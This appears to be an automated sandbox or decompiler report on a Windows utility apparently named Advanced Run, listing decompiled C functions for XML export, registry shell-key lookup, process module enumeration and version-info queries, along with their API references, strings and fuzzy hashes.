                                                                                                  			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                  				void _v514;
                                                                                                  				char _v516;
                                                                                                  				void _v1026;
                                                                                                  				char _v1028;
                                                                                                  				void* __esi;
                                                                                                  				intOrPtr* _t16;
                                                                                                  				void* _t19;
                                                                                                  				intOrPtr* _t29;
                                                                                                  				char* _t31;
                                                                                                  
                                                                                                  				_t29 = __ecx;
                                                                                                  				_v516 = 0;
                                                                                                  				memset( &_v514, 0, 0x1fc);
                                                                                                  				_v1028 = 0;
                                                                                                  				memset( &_v1026, 0, 0x1fc);
                                                                                                  				_t16 = _t29;
                                                                                                  				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
                                                                                                  					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
                                                                                                  				} else {
                                                                                                  					_push(L"<?xml version=\"1.0\" ?>\r\n");
                                                                                                  				}
                                                                                                  				E00407343(_t16);
                                                                                                  				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
                                                                                                  				_t31 =  &_v516;
                                                                                                  				E00407250(_t31, _t19);
                                                                                                  				_push(_t31);
                                                                                                  				_push(L"<%s>\r\n");
                                                                                                  				_push(0xff);
                                                                                                  				_push( &_v1028);
                                                                                                  				L0040B1EC();
                                                                                                  				return E00407343(_t29, _a4,  &_v1028);
                                                                                                  			}












                                                                                                  0x00407d9c
                                                                                                  0x00407d9e
                                                                                                  0x00407da5
                                                                                                  0x00407db3
                                                                                                  0x00407dba
                                                                                                  0x00407dc5
                                                                                                  0x00407dc7
                                                                                                  0x00407dd0
                                                                                                  0x00407dc9
                                                                                                  0x00407dc9
                                                                                                  0x00407dc9
                                                                                                  0x00407dd8
                                                                                                  0x00407de1
                                                                                                  0x00407de5
                                                                                                  0x00407deb
                                                                                                  0x00407df2
                                                                                                  0x00407df3
                                                                                                  0x00407dfe
                                                                                                  0x00407e03
                                                                                                  0x00407e04
                                                                                                  0x00407e21

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • <%s>, xrefs: 00407DF3
                                                                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
                                                                                                  • <?xml version="1.0" ?>, xrefs: 00407DC9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memset$_snwprintf
                                                                                                  • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                  • API String ID: 3473751417-2880344631
                                                                                                  • Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                  • Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
                                                                                                  • Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                  • Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 70%
                                                                                                  			E00403B3C(intOrPtr _a4) {
                                                                                                  				void _v526;
                                                                                                  				char _v528;
                                                                                                  				void _v2574;
                                                                                                  				char _v2576;
                                                                                                  				void* __edi;
                                                                                                  				intOrPtr _t29;
                                                                                                  
                                                                                                  				_v2576 = 0;
                                                                                                  				memset( &_v2574, 0, 0x7fe);
                                                                                                  				_v528 = 0;
                                                                                                  				memset( &_v526, 0, 0x208);
                                                                                                  				E00404AD9( &_v528);
                                                                                                  				_push( &_v528);
                                                                                                  				_push(L"\"%s\" /EXEFilename \"%%1\"");
                                                                                                  				_push(0x3ff);
                                                                                                  				_push( &_v2576);
                                                                                                  				L0040B1EC();
                                                                                                  				_t37 = _a4 + 0xa68;
                                                                                                  				E00404923(0x104, _a4 + 0xa68, L"exefile");
                                                                                                  				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
                                                                                                  				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
                                                                                                  				_t29 = E0040467A(_t37);
                                                                                                  				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
                                                                                                  				return _t29;
                                                                                                  			}









                                                                                                  0x00403b56
                                                                                                  0x00403b5d
                                                                                                  0x00403b6f
                                                                                                  0x00403b76
                                                                                                  0x00403b82
                                                                                                  0x00403b8d
                                                                                                  0x00403b8e
                                                                                                  0x00403b99
                                                                                                  0x00403b9e
                                                                                                  0x00403b9f
                                                                                                  0x00403ba7
                                                                                                  0x00403bb9
                                                                                                  0x00403bce
                                                                                                  0x00403be5
                                                                                                  0x00403bef
                                                                                                  0x00403bf8
                                                                                                  0x00403c00

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00403B5D
                                                                                                  • memset.MSVCRT ref: 00403B76
                                                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                  • _snwprintf.MSVCRT ref: 00403B9F
                                                                                                    • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                    • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                    • Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
                                                                                                    • Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
                                                                                                    • Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                    • Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
                                                                                                  • String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
                                                                                                  • API String ID: 1832587304-479876776
                                                                                                  • Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                  • Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
                                                                                                  • Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                  • Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
                                                                                                  				void* _v8;
                                                                                                  				int _v12;
                                                                                                  				short _v524;
                                                                                                  				char _v1036;
                                                                                                  				void* __edi;
                                                                                                  
                                                                                                  				wcscpy( &_v524, L"\\StringFileInfo\\");
                                                                                                  				wcscat( &_v524, _a8);
                                                                                                  				wcscat( &_v524, "\\");
                                                                                                  				wcscat( &_v524, _a12);
                                                                                                  				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
                                                                                                  					return 0;
                                                                                                  				}
                                                                                                  				_t34 =  &_v1036;
                                                                                                  				E00404923(0xff,  &_v1036, _v8);
                                                                                                  				E004049A2(_t34, __esi);
                                                                                                  				return 1;
                                                                                                  			}








                                                                                                  0x0040afd3
                                                                                                  0x0040afe2
                                                                                                  0x0040aff3
                                                                                                  0x0040b002
                                                                                                  0x0040b023
                                                                                                  0x00000000
                                                                                                  0x0040b047
                                                                                                  0x0040b02e
                                                                                                  0x0040b034
                                                                                                  0x0040b03c
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • wcscpy.MSVCRT ref: 0040AFD3
                                                                                                  • wcscat.MSVCRT ref: 0040AFE2
                                                                                                  • wcscat.MSVCRT ref: 0040AFF3
                                                                                                  • wcscat.MSVCRT ref: 0040B002
                                                                                                  • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C
                                                                                                    • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                    • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                    • Part of subcall function 004049A2: lstrcpyW.KERNEL32 ref: 004049B7
                                                                                                    • Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                  • String ID: \StringFileInfo\
                                                                                                  • API String ID: 393120378-2245444037
                                                                                                  • Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                  • Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
                                                                                                  • Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                  • Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: _snwprintfwcscpy
                                                                                                  • String ID: dialog_%d$general$menu_%d$strings
                                                                                                  • API String ID: 999028693-502967061
                                                                                                  • Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                  • Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
                                                                                                  • Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                  • Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 35%
                                                                                                  			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
                                                                                                  				void* _v0;
                                                                                                  				intOrPtr _v4;
                                                                                                  				intOrPtr _v8;
                                                                                                  				unsigned int _v12;
                                                                                                  				void* _v16;
                                                                                                  				char _v20;
                                                                                                  				char _v24;
                                                                                                  				intOrPtr _v32;
                                                                                                  				intOrPtr _v36;
                                                                                                  				intOrPtr _v44;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				intOrPtr _t58;
                                                                                                  				void* _t59;
                                                                                                  				void* _t72;
                                                                                                  				intOrPtr _t78;
                                                                                                  				void _t89;
                                                                                                  				signed int _t90;
                                                                                                  				int _t98;
                                                                                                  				signed int _t105;
                                                                                                  				signed int _t106;
                                                                                                  
                                                                                                  				_t106 = _t105 & 0xfffffff8;
                                                                                                  				E0040B550(0x8874, __ecx);
                                                                                                  				_t98 = 0;
                                                                                                  				_a8 = 0;
                                                                                                  				if(E00404BD3() == 0 ||  *0x4101bc == 0) {
                                                                                                  					if( *0x4101b8 != _t98) {
                                                                                                  						_t89 = _a4;
                                                                                                  						_t58 =  *0x40f83c(8, _t89);
                                                                                                  						_v8 = _t58;
                                                                                                  						if(_t58 != 0xffffffff) {
                                                                                                  							_v0 = 1;
                                                                                                  							_a560 = 0x428;
                                                                                                  							_t59 =  *0x40f834(_t58,  &_a560);
                                                                                                  							while(_t59 != 0) {
                                                                                                  								memset( &_a8, _t98, 0x21c);
                                                                                                  								_a12 = _a580;
                                                                                                  								_a8 = _t89;
                                                                                                  								wcscpy( &_a16,  &_a1096);
                                                                                                  								_a540 = _a576;
                                                                                                  								_t106 = _t106 + 0x14;
                                                                                                  								_a544 = _a572;
                                                                                                  								_a552 = 0x428;
                                                                                                  								if(E00409510(_a8,  &_a8) != 0) {
                                                                                                  									_t59 =  *0x40f830(_v16,  &_a552);
                                                                                                  									continue;
                                                                                                  								}
                                                                                                  								goto L18;
                                                                                                  							}
                                                                                                  							goto L18;
                                                                                                  						}
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					_t72 = OpenProcess(0x410, 0, _a4);
                                                                                                  					_v0 = _t72;
                                                                                                  					if(_t72 != 0) {
                                                                                                  						_push( &_a4);
                                                                                                  						_push(0x8000);
                                                                                                  						_push( &_a2160);
                                                                                                  						_push(_t72);
                                                                                                  						if( *0x40f840() != 0) {
                                                                                                  							_t6 =  &_v12;
                                                                                                  							 *_t6 = _v12 >> 2;
                                                                                                  							_v8 = 1;
                                                                                                  							_t90 = 0;
                                                                                                  							if( *_t6 != 0) {
                                                                                                  								while(1) {
                                                                                                  									_a1616 = _t98;
                                                                                                  									memset( &_a1618, _t98, 0x208);
                                                                                                  									memset( &_a8, _t98, 0x21c);
                                                                                                  									_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
                                                                                                  									_t106 = _t106 + 0x18;
                                                                                                  									_a8 = _a4;
                                                                                                  									_a12 = _t78;
                                                                                                  									 *0x40f838(_v16, _t78,  &_a1616, 0x104);
                                                                                                  									E0040920A( &_v0,  &_a1600);
                                                                                                  									_push(0xc);
                                                                                                  									_push( &_v20);
                                                                                                  									_push(_v4);
                                                                                                  									_push(_v32);
                                                                                                  									if( *0x40f844() != 0) {
                                                                                                  										_a508 = _v32;
                                                                                                  										_a512 = _v36;
                                                                                                  									}
                                                                                                  									if(E00409510(_a8,  &_v24) == 0) {
                                                                                                  										goto L18;
                                                                                                  									}
                                                                                                  									_t90 = _t90 + 1;
                                                                                                  									if(_t90 < _v44) {
                                                                                                  										_t98 = 0;
                                                                                                  										continue;
                                                                                                  									} else {
                                                                                                  									}
                                                                                                  									goto L18;
                                                                                                  								}
                                                                                                  							}
                                                                                                  						}
                                                                                                  						L18:
                                                                                                  						CloseHandle(_v16);
                                                                                                  					}
                                                                                                  				}
                                                                                                  				return _a8;
                                                                                                  			}
























                                                                                                  0x004092f3
                                                                                                  0x004092fb
                                                                                                  0x00409303
                                                                                                  0x00409305
                                                                                                  0x00409310
                                                                                                  0x00409439
                                                                                                  0x0040943f
                                                                                                  0x00409445
                                                                                                  0x0040944e
                                                                                                  0x00409452
                                                                                                  0x00409466
                                                                                                  0x0040946e
                                                                                                  0x00409475
                                                                                                  0x004094f7
                                                                                                  0x00409488
                                                                                                  0x00409494
                                                                                                  0x004094a5
                                                                                                  0x004094a9
                                                                                                  0x004094b5
                                                                                                  0x004094c3
                                                                                                  0x004094c6
                                                                                                  0x004094d5
                                                                                                  0x004094e3
                                                                                                  0x004094f1
                                                                                                  0x00000000
                                                                                                  0x004094f1
                                                                                                  0x00000000
                                                                                                  0x004094e3
                                                                                                  0x00000000
                                                                                                  0x004094f7
                                                                                                  0x00409452
                                                                                                  0x00409322
                                                                                                  0x0040932b
                                                                                                  0x00409333
                                                                                                  0x00409337
                                                                                                  0x00409341
                                                                                                  0x00409342
                                                                                                  0x0040934e
                                                                                                  0x0040934f
                                                                                                  0x00409358
                                                                                                  0x0040935e
                                                                                                  0x0040935e
                                                                                                  0x00409363
                                                                                                  0x0040936b
                                                                                                  0x0040936d
                                                                                                  0x00409377
                                                                                                  0x00409385
                                                                                                  0x0040938d
                                                                                                  0x0040939d
                                                                                                  0x004093a5
                                                                                                  0x004093ac
                                                                                                  0x004093b4
                                                                                                  0x004093c5
                                                                                                  0x004093c9
                                                                                                  0x004093da
                                                                                                  0x004093df
                                                                                                  0x004093e5
                                                                                                  0x004093e6
                                                                                                  0x004093ea
                                                                                                  0x004093f6
                                                                                                  0x004093fc
                                                                                                  0x00409407
                                                                                                  0x00409407
                                                                                                  0x0040941d
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00409423
                                                                                                  0x00409428
                                                                                                  0x00409375
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0040942e
                                                                                                  0x00000000
                                                                                                  0x00409428
                                                                                                  0x00409377
                                                                                                  0x0040936d
                                                                                                  0x004094fb
                                                                                                  0x004094ff
                                                                                                  0x004094ff
                                                                                                  0x00409337
                                                                                                  0x0040950f

                                                                                                  APIs
                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
                                                                                                  • memset.MSVCRT ref: 0040938D
                                                                                                  • memset.MSVCRT ref: 0040939D
                                                                                                    • Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233
                                                                                                  • memset.MSVCRT ref: 00409488
                                                                                                  • wcscpy.MSVCRT ref: 004094A9
                                                                                                  • CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 3300951397-0
                                                                                                  • Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                  • Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
                                                                                                  • Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                  • Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 44%
                                                                                                  			E00402EC8(void* __ebx) {
                                                                                                  				struct tagRECT _v20;
                                                                                                  				struct tagPAINTSTRUCT _v84;
                                                                                                  
                                                                                                  				GetClientRect( *(__ebx + 0x10),  &_v20);
                                                                                                  				_v20.left = _v20.right - GetSystemMetrics(0x15);
                                                                                                  				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
                                                                                                  				asm("movsd");
                                                                                                  				asm("movsd");
                                                                                                  				asm("movsd");
                                                                                                  				asm("movsd");
                                                                                                  				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
                                                                                                  				return EndPaint( *(__ebx + 0x10),  &_v84);
                                                                                                  			}





                                                                                                  0x00402ed7
                                                                                                  0x00402eee
                                                                                                  0x00402ef8
                                                                                                  0x00402f00
                                                                                                  0x00402f01
                                                                                                  0x00402f05
                                                                                                  0x00402f0a
                                                                                                  0x00402f1a
                                                                                                  0x00402f30

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                  • String ID:
                                                                                                  • API String ID: 19018683-0
                                                                                                  • Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                  • Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
                                                                                                  • Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                  • Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 50%
                                                                                                  			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                  				void _v514;
                                                                                                  				signed short _v516;
                                                                                                  				signed short* _t34;
                                                                                                  				signed int _t37;
                                                                                                  				void* _t40;
                                                                                                  				signed short* _t44;
                                                                                                  				void* _t46;
                                                                                                  
                                                                                                  				_t40 = __edi;
                                                                                                  				E00407343(__edi, _a4, L"<item>\r\n");
                                                                                                  				_t37 = 0;
                                                                                                  				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
                                                                                                  					do {
                                                                                                  						_v516 = _v516 & 0x00000000;
                                                                                                  						memset( &_v514, 0, 0x1fc);
                                                                                                  						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
                                                                                                  						_t44 =  &_v516;
                                                                                                  						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
                                                                                                  						_t34 = _t44;
                                                                                                  						_push(_t34);
                                                                                                  						_push( *((intOrPtr*)(__edi + 0x64)));
                                                                                                  						_push(_t34);
                                                                                                  						_push(L"<%s>%s</%s>\r\n");
                                                                                                  						_push(0x2000);
                                                                                                  						_push( *((intOrPtr*)(__edi + 0x68)));
                                                                                                  						L0040B1EC();
                                                                                                  						_t46 = _t46 + 0x24;
                                                                                                  						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
                                                                                                  						_t37 = _t37 + 1;
                                                                                                  					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
                                                                                                  				}
                                                                                                  				return E00407343(_t40, _a4, L"</item>\r\n");
                                                                                                  			}










                                                                                                  0x004079a4
                                                                                                  0x004079b8
                                                                                                  0x004079bd
                                                                                                  0x004079c2
                                                                                                  0x004079c5
                                                                                                  0x004079c5
                                                                                                  0x004079db
                                                                                                  0x004079f7
                                                                                                  0x00407a06
                                                                                                  0x00407a0c
                                                                                                  0x00407a11
                                                                                                  0x00407a13
                                                                                                  0x00407a14
                                                                                                  0x00407a17
                                                                                                  0x00407a18
                                                                                                  0x00407a1d
                                                                                                  0x00407a22
                                                                                                  0x00407a25
                                                                                                  0x00407a2a
                                                                                                  0x00407a35
                                                                                                  0x00407a3a
                                                                                                  0x00407a3b
                                                                                                  0x00407a40
                                                                                                  0x00407a52

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 004079DB
                                                                                                    • Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E
                                                                                                    • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                    • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                  • _snwprintf.MSVCRT ref: 00407A25
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                  • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                  • API String ID: 1775345501-2769808009
                                                                                                  • Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                  • Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
                                                                                                  • Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                  • Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 64%
                                                                                                  			E0040467A(void* __edi) {
                                                                                                  				signed int _v8;
                                                                                                  				void* _v12;
                                                                                                  				void* _v16;
                                                                                                  				void _v2062;
                                                                                                  				short _v2064;
                                                                                                  				int _t16;
                                                                                                  
                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                  				_t16 = E004043F8( &_v12, 0x20019);
                                                                                                  				if(_t16 == 0) {
                                                                                                  					_v2064 = _v2064 & _t16;
                                                                                                  					memset( &_v2062, _t16, 0x7fe);
                                                                                                  					_push(__edi + 0x20a);
                                                                                                  					_push(L"%s\\shell\\%s");
                                                                                                  					_push(0x3ff);
                                                                                                  					_push( &_v2064);
                                                                                                  					L0040B1EC();
                                                                                                  					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
                                                                                                  						_v8 = 1;
                                                                                                  						RegCloseKey(_v16);
                                                                                                  					}
                                                                                                  				}
                                                                                                  				return _v8;
                                                                                                  			}









                                                                                                  0x00404683
                                                                                                  0x00404692
                                                                                                  0x00404699
                                                                                                  0x0040469b
                                                                                                  0x004046af
                                                                                                  0x004046ba
                                                                                                  0x004046bc
                                                                                                  0x004046c7
                                                                                                  0x004046cc
                                                                                                  0x004046cd
                                                                                                  0x004046ee
                                                                                                  0x004046f3
                                                                                                  0x004046fa
                                                                                                  0x004046fa
                                                                                                  0x004046ee
                                                                                                  0x00404705

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 004046AF
                                                                                                  • _snwprintf.MSVCRT ref: 004046CD
                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: CloseOpen_snwprintfmemset
                                                                                                  • String ID: %s\shell\%s
                                                                                                  • API String ID: 1458959524-3196117466
                                                                                                  • Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                  • Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
                                                                                                  • Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
